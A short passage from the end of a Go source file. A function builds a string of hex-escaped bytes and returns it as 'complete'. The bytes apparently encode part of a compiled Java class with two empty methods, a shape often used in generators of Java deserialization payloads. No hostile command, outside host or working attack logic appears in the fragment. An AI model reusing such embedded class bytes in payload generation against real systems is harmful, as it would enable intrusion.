		"\x00\x00\x01\x00\x36\x00\x37\x00\x02\x00\x43\x00\x00\x00\x3f\x00" +
		"\x00\x00\x03\x00\x00\x00\x01\xb1\x00\x00\x00\x02\x00\x45\x00\x00" +
		"\x00\x06\x00\x01\x00\x00\x00\x1b\x00\x46\x00\x00\x00\x20\x00\x03" +
		"\x00\x00\x00\x01\x00\x34\x00\x35\x00\x00\x00\x00\x00\x01\x00\x3a" +
		"\x00\x3b\x00\x01\x00\x00\x00\x01\x00\x3c\x00\x3d\x00\x02\x00\x47" +
		"\x00\x00\x00\x04\x00\x01\x00\x39\x00\x01\x00\x36\x00\x3e\x00\x02" +
		"\x00\x43\x00\x00\x00\x49\x00\x00\x00\x04\x00\x00\x00\x01\xb1\x00" +
		"\x00\x00\x02\x00\x45\x00\x00\x00\x06\x00\x01\x00\x00\x00\x20\x00" +
		"\x46\x00\x00\x00\x2a\x00\x04\x00\x00\x00\x01\x00\x34\x00\x35\x00" +
		"\x00\x00\x00\x00\x01\x00\x3a\x00\x3b\x00\x01\x00\x00\x00\x01\x00" +
		"\x3f\x00\x40\x00\x02\x00\x00\x00\x01\x00\x41\x00\x42\x00\x03\x00" +
		"\x47\x00\x00\x00\x04\x00\x01\x00\x39\x00\x00"

	return complete
}
